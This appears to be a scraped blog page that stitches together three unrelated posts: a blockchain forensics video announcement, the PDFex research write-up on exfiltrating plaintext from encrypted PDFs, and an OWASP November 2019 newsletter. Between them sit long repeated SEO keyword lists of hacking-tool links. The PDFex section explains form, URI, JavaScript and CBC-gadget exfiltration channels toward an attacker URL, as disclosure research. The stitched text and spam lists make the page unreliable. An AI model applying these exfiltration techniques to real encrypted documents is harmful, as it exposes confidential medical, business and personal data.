quarta-feira, 31 de maio de 2023

Blockchain Forensics R&D With Python - Tracking Attackers, Etherscan API Usage, Python Coding, Signature Lookups And Decompiling Bytecode

 Added a new playlist over the last few weeks, its up to about 8 videos now which starts out writing code to monitor attackers address changes on the blockchain followed by using EtherScan API's to track some movements and make sense of things with a few other learning points along the way...   

There is one pre-requisite video however which is where this series came from which is another video I created where we took apart a smart contract from a YouTube scam to find the attackers malicious code, so review that first below: 

Twitter: @ficti0n
Web: http://cclabs.io/


If you learn something from this blog/video consider sharing it on your social media or retweeting my posts.


Here is the Pre-Requisite Video to this series Which does a smart contract audit of a malicious front running bot: 



Here is the new playlist series which digs into tracking this attacker: 


Link to full Playlist since blogger is not letting me embed the playlist: 
https://www.youtube.com/playlist?list=PLCwnLq3tOElrUdIg4LgdhPhCKAiy7NZYA




Intro to the playlist: 


 

Related posts

  1. Pentest Box Tools Download
  2. Hacker Tool Kit
  3. Black Hat Hacker Tools
  4. Best Pentesting Tools 2018
  5. Hack Tools For Pc
  6. Top Pentest Tools
  7. Pentest Tools Android
  8. Game Hacking
  9. New Hack Tools
  10. Pentest Tools Windows
  11. Hack Tools 2019
  12. Hacking Tools Free Download
  13. Pentest Tools Alternative
  14. Pentest Tools Tcp Port Scanner
  15. Pentest Recon Tools
  16. Hacker Tools Apk
  17. Pentest Tools Android
  18. Hacker Tools Linux
  19. Pentest Tools
  20. Kik Hack Tools
  21. Pentest Tools Subdomain
  22. Hacking Tools Usb
  23. Easy Hack Tools
  24. Pentest Tools Bluekeep
  25. Hacking Tools 2019
  26. Hacker Tools For Ios
  27. Pentest Reporting Tools
  28. Kik Hack Tools
  29. How To Make Hacking Tools
  30. Hacking Tools And Software
  31. Pentest Tools For Windows
  32. Pentest Tools Url Fuzzer
  33. Android Hack Tools Github
  34. Pentest Tools List
  35. Hacking Tools Free Download
  36. Hacking Tools Free Download
  37. Hacker Tools Apk Download
  38. Pentest Tools Website Vulnerability
  39. Hacker Tools Hardware
  40. What Is Hacking Tools
  41. Top Pentest Tools
  42. Hacker Tools For Pc
  43. Hack Rom Tools
  44. Hack Rom Tools
  45. Bluetooth Hacking Tools Kali
  46. Pentest Tools Android
  47. Pentest Tools Url Fuzzer
  48. Hack Tool Apk
  49. Install Pentest Tools Ubuntu
  50. Hack Tools For Windows
  51. Hack Website Online Tool
  52. Hacking Tools For Windows
  53. Hacking Tools For Windows
  54. Hack And Tools
  55. Hacking Tools Windows
  56. Hackrf Tools
  57. Hacking Tools 2020
  58. Pentest Tools Alternative
  59. Hacking Tools For Kali Linux
  60. Black Hat Hacker Tools
  61. Android Hack Tools Github
  62. Android Hack Tools Github
  63. Easy Hack Tools
  64. Hack Tools Pc
  65. Hack Website Online Tool
  66. New Hack Tools
  67. Hack Tools
  68. Hacker Tools List
  69. Hack Tools Mac
  70. Hacking Tools Software
  71. Hacking Tools Usb
  72. Usb Pentest Tools
  73. Termux Hacking Tools 2019
  74. Ethical Hacker Tools
  75. Hacker Tools Online
  76. Hacking Tools Windows
  77. Hackrf Tools
  78. Beginner Hacker Tools
  79. Hacker Tools Free
  80. Hack Tools For Mac
  81. Pentest Tools Kali Linux
  82. Hack Tool Apk No Root
  83. Hacker Security Tools
  84. Hack Apps
  85. Pentest Tools Find Subdomains
  86. How To Install Pentest Tools In Ubuntu
  87. Pentest Recon Tools
  88. Free Pentest Tools For Windows
  89. Hack Tools 2019
  90. Hacker Tools For Pc
  91. Pentest Tools Free
  92. Pentest Tools For Windows
  93. Hacker
  94. Pentest Tools For Ubuntu
  95. Hacking Tools Mac
  96. Pentest Reporting Tools
  97. Hacker Security Tools
  98. Pentest Tools Android
  99. Pentest Tools Linux
  100. Hack Tools For Ubuntu
  101. Hack Tools Mac
  102. Hacker Tools Github
  103. Bluetooth Hacking Tools Kali
  104. Hacker Tools List
  105. Hacking Tools 2020
  106. Hack Tools Mac
  107. Hacker Tools Mac
  108. World No 1 Hacker Software

PDFex: Major Security Flaws In PDF Encryption

After investigating the security of PDF signatures, we had a deeper look at PDF encryption. In co­ope­ra­ti­on with our friends from Müns­ter Uni­ver­si­ty of Ap­p­lied Sci­en­ces, we discovered severe weaknesses in the PDF encryption standard which lead to full plaintext exfiltration in an active-attacker scenario.

To guarantee confidentiality, PDF files can be encrypted. This enables the secure transfer and storing of sensitive documents without any further protection mechanisms.
The key management between the sender and recipient may be password based (the recipient must know the password used by the sender, or it must be transferred to them through a secure channel) or public key based (i.e., the sender knows the X.509 certificate of the recipient).
In this research, we analyze the security of encrypted PDF files and show how an attacker can exfiltrate the content without having the corresponding keys.

So what is the problem?

The security problems known as PDFex discovered by our research can be summarized as follows:
  1. Even without knowing the corresponding password, the attacker possessing an encrypted PDF file can manipulate parts of it.
    More precisely, the PDF specification allows the mixing of ciphertexts with plaintexts. In combination with further PDF features which allow the loading of external resources via HTTP, the attacker can run direct exfiltration attacks once a victim opens the file.
  2. PDF encryption uses the Cipher Block Chaining (CBC) encryption mode with no integrity checks, which implies ciphertext malleability.
    This allows us to create self-exfiltrating ciphertext parts using CBC malleability gadgets. We use this technique not only to modify existing plaintext but to construct entirely new encrypted objects.

Who uses PDF Encryption?

PDF encryption is widely used. Prominent companies like Canon and Samsung apply PDF encryption in document scanners to protect sensitive information.
Further providers like IBM offer PDF encryption services for PDF documents and other data (e.g., confidential images) by wrapping them into PDF. PDF encryption is also supported in different medical products to transfer health records, for example InnoportRicohRimage.
Due to the shortcomings regarding the deployment and usability of S/MIME and OpenPGP email encryption, some organizations use special gateways to automatically encrypt email messages as encrypted PDF attachments, for example CipherMailEncryptomaticNoSpamProxy. The password to decrypt these PDFs can be transmitted over a second channel, such as a text message (i.e., SMS).


Technical details of the attacks

We developed two different attack classes on PDF Encryption: Direct Exfiltration and CBC Gadgets.

Attack 1: Direct Exfiltration (Attack A)


The idea of this attack is to abuse the partial encryption feature by modifying an encrypted PDF file. As soon as the file is opened and decrypted by the victim sensitive content is sent to the attacker. Encrpyted PDF files does not have integrity protection. Thus, an attacker can modify the structure of encrypted PDF documents, add unencrypted objects, or wrap encrypted parts into a context controlled the attacker.
In the given example, the attacker abuses the flexibility of the PDF encryption standard to define certain objects as unencrypted. The attacker modifies the Encrypt dictionary (6 0 obj) in a way that the document is partially encrypted – all streams are left AES256 encrypted while strings are defined as unencrypted by setting the Identity filter. Thus, the attacker can freely modify strings in the document and add additional objects containing unencrypted strings.
The content to be exfiltrated is left encrypted, see Contents (4 0 obj) and EmbeddedFile (5 0 obj). The most relevant object for the attack is the definition of an Action, which can submit a form, invoke a URL, or execute JavaScript. The Action references the encrypted parts as content to be included in requests and can thereby be used to exfiltrate their plaintext to an arbitrary URL. The execution of the Action can be triggered automatically once the PDF file is opened (after the decryption) or via user interaction, for example, by clicking within the document.
This attack has three requirements to be successful. While all requirements are PDF standard compliant, they have not necessarily been implemented by every PDF application:
  • Partial encryption: Partially encrypted documents based on Crypt Filters like the Identity filter or based on other less supported methods like the None encryption algorithm.
  • Cross-object references: It must be possible to reference and access encrypted string or stream objects from unencrypted attacker-controlled parts of the PDF document.
  • Exfiltration channel: One of the interactive features allowing the PDF reader to communicate via Internet must exist, with or without user interaction. Such Features are PDF FormsHyperlinks, or JavaScript.
Please note that the attack does not abuse any cryptographic issues, so that there are no requirements to the underlying encryption algorithm (e.g., AES) or the encryption mode (e.g., CBC).
In the following, we show three techniques how an attack can exfiltrate the content.

Exfiltration via PDF Forms (A1)


The PDF standard allows a document's encrypted streams or strings to be defined as values of a PDF form to be submitted to an external server. This can be done by referencing their object numbers as the values of the form fields within the Catalog object, as shown in the example on the left side. The value of the PDF form points to the encrypted data stored in 2 0 obj.
To make the form auto-submit itself once the document is opened and decrypted, an OpenAction can be applied. Note that the object which contains the URL (http://p.df) for form submission is not encrypted and completely controlled by the attacker. As a result, as soon as the victim opens the PDF file and decrypts it, the OpenAction will be executed by sending the decrypted content of 2 0 obj to (http://p.df).

If forms are not supported by the PDF viewer, there is a second method to achieve direct exfiltration of a plaintext. The PDF standard allows setting a "base" URI in the Catalog object used to resolve all relative URIs in the document.
This enables an attacker to define the encrypted part as a relative URI to be leaked to the attacker's web server. Therefore the base URI will be prepended to each URI called within the PDF file. In the given example, we set the base URI to (http://p.df).
The plaintext can be leaked by clicking on a visible element such as a link, or without user interaction by defining a URI Action to be automatically performed once the document is opened.
In the given example, we define the base URI within an Object Stream, which allows objects of arbitrary type to be embedded within a stream. This construct is a standard compliant method to put unencrypted and encrypted strings within the same document. Note that for this attack variant, only strings can be exfiltrated due to the specification, but not streams; (relative) URIs must be of type string. However, fortunately (from an attacker's point of view), all encrypted streams in a PDF document can be re-written and defined as hex-encoded strings using the hexadecimal string notation.
Nevertheless, the attack has some notable drawbacks compared to  Exfiltration via PDF Forms:
  • The attack is not silent. While forms are usually submitted in the background (by the PDF viewer itself), to open hyperlinks, most applications launch an external web browser.
  • Compared to HTTP POST, the length of HTTP GET requests, as invoked by hyperlinks, is limited to a certain size.
  • PDF viewers do not necessarily URL-encode binary strings, making it difficult to leak compressed data.

Exfiltration via JavaScript (A3)

The PDF JavaScript reference allows JavaScript code within a PDF document to directly access arbitrary string/stream objects within the document and leak them with functions such as *getDataObjectContents* or *getAnnots*.
In the given example, the stream object 7 is given a Name (x), which is used to reference and leak it with a JavaScript action that is automatically triggered once the document is opened. The attack has some advantages compared to Exfiltration via PDF Forms and Exfiltration via Hyperlinks, such as the flexibility of an actual programming language.
It must, however, be noted that – while JavaScript actions are part of the PDF specification – various PDF applications have limited JavaScript support or disable it by default (e.g., Perfect PDF Reader).

Attack 2: CBC Gadgets (Attack B)

Not all PDF viewers support partially encrypted documents, which makes them immune to direct exfiltration attacks. However, because PDF encryption generally defines no authenticated encryption, attackers may use CBC gadgets to exfiltrate plaintext. The basic idea is to modify the plaintext data directly within an encrypted object, for example, by prefixing it with an URL. The CBC gadget attack, thus does not necessarily require cross-object references.
Note that all gadget-based attacks modify existing encrypted content or create new content from CBC gadgets. This is possible due to the malleability property of the CBC encryption mode.
This attack has two necessary preconditions:
  • Known plaintext: To manipulate an encrypted object using CBC gadgets, a known plaintext segment is necessary. For AESV3 – the most recent encryption algorithm – this plain- text is always given by the Perms entry. For older versions, known plaintext from the object to be exfiltrated is necessary.
  • Exfiltration channel: One of the interactive features: PDF Forms or Hyperlinks.
These requirements differ from those of the direct exfiltration attacks, because the attacks are applied "through" the encryption layer and not outside of it.

Exfiltration via PDF Forms (B1)

As described above, PDF allows the submission of string and stream objects to a web server. This can be used in conjunction with CBC gadgets to leak the plaintext to an attacker-controlled server, even if partial encryption is not allowed.
A CBC gadget constructed from the known plaintext can be used as the submission URL, as shown in the example on the left side. The construction of this particular URL gadget is challenging. As PDF encryption uses PKCS#5 padding, constructing the URL using a single gadget from the known Perms plaintext is difficult, as the last 4 bytes that would need to contain the padding are unknown.
However, we identified two techniques to solve this. On the one hand, we can take the last block of an unknown ciphertext and append it to our constructed URL, essentially reusing the correct PKCS#5 padding of the unknown plaintext. Unfortunately, this would introduce 20 bytes of random data from the gadgeting process and up to 15 bytes of the unknown plaintext to the end of our URL.
On the other hand, the PDF standard allows the execution of multiple OpenActions in a document, allowing us to essentially guess the last padding byte of the Perms value. This is possible by iterating over all 256 possible values of the last plaintext byte to get 0x01, resulting in a URL with as little random as possible (3 bytes). As a limitation, if one of the 3 random bytes contains special characters, the form submission URL might break.
Using CBC gadgets, encrypted plaintext can be prefixed with one or more chosen plaintext blocks. An attacker can construct URLs in the encrypted PDF document that contain the plaintext to exfiltrate. This attack is similar to the exfiltration hyperlink attack (A2). However, it does not require the setting of a "base" URI in plaintext to achieve exfiltration.
The same limitations described for direct exfiltration based on links (A2) apply. Additionally, the constructed URL contains random bytes from the gadgeting process, which may prevent the exfiltration in some cases.

Exfiltration via Half-Open Object Streams (B3)

While CBC gadgets are generally restricted to the block size of the underlying block cipher – and more specifically the length of the known plaintext, in this case, 12 bytes – longer chosen plaintexts can be constructed using compression. Deflate compression, which is available as a filter for PDF streams, allows writing both uncompressed and compressed segments into the same stream. The compressed segments can reference back to the uncompressed segments and achieve the repetition of byte strings from these segments. These backreferences allow us to construct longer continuous plaintext blocks than CBC gadgets would typically allow for. Naturally, the first uncompressed occurrence of a byte string still appears in the decompressed result. Additionally, if the compressed stream is constructed using gadgets, each gadget generates 20 random bytes that appear in the decompressed stream. A non-trivial obstacle is to keep the PDF viewer from interpreting these fragments in the decompressed stream. While hiding the fragments in comments is possible, PDF comments are single-line and are thus susceptible to newline characters in the random bytes. Therefore, in reality, the length of constructed compressed plaintexts is limited.
To deal with this caveat, an attacker can use ObjectStreams which allow the storage of arbitrary objects inside a stream. The attacker uses an object stream to define new objects using CBC gadgets. An object stream always starts with a header of space-separated integers which define the object number and the byte offset of the object inside the stream. The dictionary of an object stream contains the key First which defines the byte offset of the first object inside the stream. An attacker can use this value to create a comment of arbitrary size by setting it to the first byte after their comment.
Using compression has the additional advantage that compressed, encrypted plaintexts from the original document can be embedded into the modified object. As PDF applications often create compressed streams, these can be incorporated into the attacker-created compressed object and will therefore be decompressed by the PDF applications. This is a significant advantage over leaking the compressed plaintexts without decompression as the compressed bytes are often not URL-encoded correctly (or at all) by the PDF applications, leading to incomplete or incomprehensible plaintexts. However, due to the inner workings of the deflate algorithms, a complete compressed plaintext can only be prefixed with new segments, but not postfixed. Therefore, a string created using this technique cannot be terminated using a closing bracket, leading to a half-open string. This is not a standard compliant construction, and PDF viewers should not accept it. However, a majority of PDF viewers accept it anyway.

Evaluation

During our security analysis, we identified two standard compliant attack classes which break the confidentiality of encrypted PDF files. Our evaluation shows that among 27 widely-used PDF viewers, all of them are vulnerable to at least one of those attacks, including popular software such as Adobe Acrobat, Foxit Reader, Evince, Okular, Chrome, and Firefox.
You can find the detailed results of our evaluation here.

What is the root cause of the problem?

First, many data formats allow to encrypt only parts of the content (e.g., XML, S/MIME, PDF). This encryption flexibility is difficult to handle and allows an attacker to include their own content, which can lead to exfiltration channels.
Second, when it comes to encryption, AES-CBC – or encryption without integrity protection in general – is still widely supported. Even the latest PDF 2.0 specification released in 2017 still relies on it. This must be fixed in future PDF specifications and any other format encryption standard, without enabling backward compatibility that would re-enable CBC gadgets.
A positive example is JSON Web Encryption standard, which learned from the CBC attacks on XML and does not support any encryption algorithm without integrity protection.

Authors of this Post

Jens Müller
Fabian Ising
Vladislav Mladenov
Christian Mainka
Sebastian Schinzel
Jörg Schwenk

Acknowledgements

Many thanks to the CERT-Bund team for the great support during the responsible disclosure process.
Related links

  1. Hacking Tools Free Download
  2. How To Hack
  3. Pentest Tools Download
  4. Pentest Tools Android
  5. Pentest Tools Framework
  6. Hack Tools For Ubuntu
  7. Hacking Tools And Software
  8. Pentest Box Tools Download
  9. Hack Tools For Mac
  10. Pentest Tools List
  11. Hack Tools
  12. Usb Pentest Tools
  13. Hack Apps
  14. Hacker Security Tools
  15. Hacking Tools Usb
  16. Hacker
  17. New Hack Tools
  18. Hacking Tools Windows
  19. Hacker Search Tools
  20. What Is Hacking Tools
  21. Pentest Tools Review
  22. Pentest Tools Bluekeep
  23. Hack Rom Tools
  24. New Hacker Tools
  25. New Hack Tools
  26. Pentest Box Tools Download
  27. Hack Rom Tools
  28. Pentest Tools Bluekeep
  29. Hack Tools For Mac
  30. Beginner Hacker Tools
  31. Hack Rom Tools
  32. Nsa Hack Tools Download
  33. Physical Pentest Tools
  34. Pentest Tools Windows
  35. Black Hat Hacker Tools
  36. Hacking Tools For Mac
  37. Hack And Tools
  38. Usb Pentest Tools
  39. Hacking Tools For Windows
  40. Hack Website Online Tool
  41. Pentest Tools
  42. Black Hat Hacker Tools
  43. Hack Tools Online
  44. Pentest Tools Url Fuzzer
  45. Hacking Tools For Windows 7
  46. What Are Hacking Tools
  47. New Hack Tools
  48. Hack Tools Download
  49. What Is Hacking Tools
  50. Hack App
  51. Hack Tools Pc
  52. Hacker Tools For Pc
  53. Hacking Tools Github
  54. Hacker Tools Online
  55. Hack Website Online Tool
  56. Pentest Tools Website
  57. Ethical Hacker Tools
  58. Hackrf Tools
  59. Hack Tools Download
  60. Hacker Security Tools
  61. Hack Tool Apk No Root
  62. Hacker Tools 2020
  63. Pentest Tools Tcp Port Scanner
  64. Pentest Tools Windows
  65. Pentest Tools Nmap
  66. Usb Pentest Tools
  67. Hacker Tools Apk Download
  68. Tools For Hacker
  69. Underground Hacker Sites
  70. How To Install Pentest Tools In Ubuntu
  71. Hacking Tools Windows
  72. New Hacker Tools
  73. Hacking Tools For Beginners
  74. Hacker Tools Mac
  75. Termux Hacking Tools 2019
  76. Hacking Tools Software
  77. Hacking Tools For Pc
  78. Hacking Tools For Windows 7
  79. Hack Tool Apk
  80. Hacker Tool Kit
  81. Pentest Tools Alternative
  82. Tools 4 Hack
  83. Pentest Tools Website Vulnerability
  84. Bluetooth Hacking Tools Kali
  85. Hacker Tools
  86. Hacker Security Tools
  87. Pentest Tools Open Source
  88. Easy Hack Tools
  89. Hacking Tools For Windows 7
  90. Hack Tools Download
  91. Hack And Tools
  92. Pentest Tools Download
  93. Hacker Tools List
  94. Pentest Tools Nmap
  95. Hacker Tools 2019
  96. Pentest Tools Subdomain
  97. Hack Tools For Pc
  98. Hacking Tools 2019
  99. Pentest Tools For Mac
  100. Pentest Tools Review
  101. Hacking Tools For Kali Linux
  102. Hack Tools Download
  103. Nsa Hacker Tools
  104. Pentest Tools For Windows
  105. Hacking Tools Github
  106. Hack Tools Github
  107. Underground Hacker Sites
  108. Hacking Tools Mac
  109. Hack Tools Online
  110. Hacker Search Tools
  111. Pentest Tools
  112. Hacker Tools
  113. Kik Hack Tools
  114. How To Make Hacking Tools
  115. Wifi Hacker Tools For Windows
  116. Pentest Tools Url Fuzzer
  117. What Are Hacking Tools
  118. Hacker Tools Online
  119. Hacking Tools For Pc
  120. Pentest Tools
  121. Pentest Tools List
  122. Beginner Hacker Tools
  123. Android Hack Tools Github
  124. Growth Hacker Tools

November 2019 Connector

OWASP
Connector
November 2019

COMMUNICATIONS


Letter from the Vice-Chairman

Dear OWASP Community, 

Preparation for next year's conferences is underway. I had the pleasure of meeting people from our community at a recent ISACA Ireland event where I had an OWASP stand. I also had lots of swag to give away, loads left which I plan to share out amongst the community. 

I was on a call recently with both WIA leadership and a number of individuals looking to broaden our diversity reach, forming DIA (diversity in AppSec). This was a positive call and I look forward to reviewing their proposal under the committee 2.0 operating model.

I'd like to thank our volunteers, chapter and project leaders for making OWASP what it is today. We wouldn't have a foundation without you. We always want to make things better, to this end, it would be great if you could fill out the following feedback form.

Thank you, 
Owen Pendlebury, Vice-Chairman

FROM THE EXECUTIVE DIRECTOR


As we wind down 2019, we are planning lots of new opportunities to get involved with OWASP next year. The current working draft of the 2020 Operating Plan can be found on our staging site for our new website which is planned to launch next month.
 
Some of the highlights for 2020:
  • Quarterly Town Hall meetings.
  • Two Project Summits - the first in February 2020
  • Pilot single-day AppSec Days worldwide to offer local training and community.
We are also set to further increase the transparency of the daily workings of OWASP through our Staff Projects page. The pages linked there will always be a work in progress; some of which today are still only templates but still a great resource to know what's going on at OWASP.

All of this which adds to our Global and Regional Events, ongoing local chapter support, and other member activities. Our plans are ambitious and we look forward to your continued support this and every month as we look to better secure the web.



OWASP Foundation Global AppSec Event Dates for 2020

Global AppSec Dublin, June 15 - 19, 2020
(Formerly known as AppSec EU)
Sponsorship is now available
Call for Papers & Call for Training December 2019
 
Global AppSec San Francisco, October 19 - 23, 2020
(Formerly known as AppSec US)
CFP &  CFT February 2020

** Visit our website for future announcements.**
NEW OWASP Project Summit - Winter 2020
February 2020 in Cancun, Mexico

 
The OWASP Foundation will host a three-day working session for FIVE selected projects in Cancun, Mexico, February 2020. Arrival day will be Wednesday the 19th and departures will be the 23rd. Projects must apply and then get selected to participate. The application process will require project meeting goals, work plans, key contributors, and expected attendance. The OWASP Foundation Officers Group will make the final selection. For more information click here

You can also email Emily Berman Global Events Director or Harold Blankenship Director of Technology and Projects.
Announcing a New Opportunity to become part of a Global AppSec Program Team
 
Conference Program Teams are constituted for each Global AppSec event and consists of members of OWASP members and staff. The selection of team members is based on subject-matter expertise and a balanced representation of the OWASP community. For planning purposes, team members shall reside on the continent of the Global AppSec for which they serve. Teams are constituted no later than six months prior to the Global AppSec event.

To apply to become a member of the Conference Program Team click here.


 
We are so excited to announce that both the London OWASP and WIA community have been asked to speak at BlackHat Europe 2019 on Wednesday 4 December at the EXCEL London.   Andra Lezza is leading the panel of women to "Share insights gained at different stages of their careers to help other women in the field."  Thank you, Andra, for leading the initiative and also to Sonya Moisset, Bibi Sanjarani, Katy Anton and Lauren Chiesa for volunteering to be part of the panel.  Also from the OWASP Community and a London Chapter Leader Sam Stepanyan and Paul Harragan.  Sam and Pau will be presenting a more in-depth demo on the OWASP Nettacker.  Good luck to all the speakers have a great conference.

I would like to encourage all of the OWASP community that will be attending BlackHat Europe to please make every effort to attend and support our fellow OWASP members Wednesday, 4 December 2019. (Click to view the schedule details.)

OWASP Members don't forget you are eligible for € 200.00 discount, email marketing@owasp.org for code to use when registering.


BlackHat Europe has extended an invitation to our London WIA community  to  lead a panel to "Share insights gained at different stages of their careers that could help other women in the field."  Thank you to Andra Lezza for leading this initiative and Sonya Moisset, Bibi Sanjarani, Katy Anton and Lauren Chiesa for volunteering to be part of the panel and to contribute.  Good luck I am sure your session will be a huge success.

BlackHat Europe 2019 London at EXCEL London
2019 December 2-5 
The OWASP Booth 1015
Business Hall December 4 & 5 
December 4, 10:30 AM - 7:00 PM
December 5: 10:00 AM - 4:00 PM

EVENTS 

You may also be interested in one of our other affiliated events:


REGIONAL EVENTS
Event Date Location
German OWASP Day 2019 December 10, 2019 Karlsruhe, Germany
AppSec California 2020 January 21 - 24, 2020 Santa Monica, CA
OWASP New Zealand Day 2020 February 20 - 21, 2020 Auckland, New Zealand
OWASP Seasides March 3 - 5, 2020 Panjim Goa, India
SnowFROC 2020 March 5, 2020 Denver, CO
AppSec Morocco & Africa 2020 June 4 - 5, 2020 Rabat, Morocco

GLOBAL PARTNERSHIP EVENTS
Event Date Location
BlackHat Europe 2019 December 2 - 5, 2019 London

PROJECTS


As the foundation moves toward the migration of the OWASP web presence from the old wiki site to our new Github-hosted home, some of you may still have questions regarding what to move and how to move it. Essentially, if you have a chapter page or project page and you have not migrated it to the new website, that would be first. Steps on what to do and what is needed can be found at https://www2.owasp.org/migration There are also some minor instructions on the default project or chapter page itself. And if you are wondering where that page is located, you can go to https://github.com/OWASP and type your chapter name in the repository search bar. If your project or chapter is not there, contact me. Lastly, there are a number of excellent examples already done by other leaders (also linked on the migration page).

And, as a precaution, you should click over into the 'Settings' of your repository and then click the 'Collaborators & teams' link on the left menu and check to make sure that the usernames added to Collaborators match what you expect.  Having someone you do not know edit your web page without your knowledge is no longer the expected behavior.

Some resources, mostly for projects, have been uploaded to the OWASP Site Theme Repository and can be linked to via the /assets/image/common/<file> URL.

After your chapter or project page is done, there is a www-community repository which would include any files from the wiki that are not currently in a project or chapter or board/staff policy area.  For instance, there are pages there for GSoC and XSS and CSRF.  A list of the top pages that need to be migrated can be found attached to one of the TODO cards on our website migration Trello board which you are invited to join if you want to help migrate loose pages and/or perform some automation work.

Our current plan can be found on the Website Relaunch project page.

PROJECT ANNOUNCEMENT

As part of OWASP's participation in Google's Season of Docs, the ZAP project has had Nirojan Selvanathan (@sshniro)  working on API documentation.  The first iteration of the documentation is now live.  It includes Java, Python, and shell
example snippets all presented in a responsive and accessible design which we will continue to build on in the future.

Big thanks to Nirojan for his efforts on this wonderful initiative!
Congratulations and thanks to Google Open Source for helping to bring the open-source and technical writer communities together!

COMMUNITY

 
Welcome to our New OWASP Chapters

Colombo, Sri Lanka
Des Moines, IA
Harrisburg, PA
Louisville, KY
Monterrey, Brazil
Moscow, Russia


 
Contributor Corporate Members
 

 
*Ads and logos are not endorsements and reflect the messages of the advertiser only. *
Join us
Donate
Our mailing address is:
OWASP Foundation 
1200-C Agora Drive, #232
Bel Air, MD 21014  
Contact Us
Unsubscribe






This email was sent to *|EMAIL|*
why did I get this?    unsubscribe from this list    update subscription preferences
*|LIST:ADDRESSLINE|*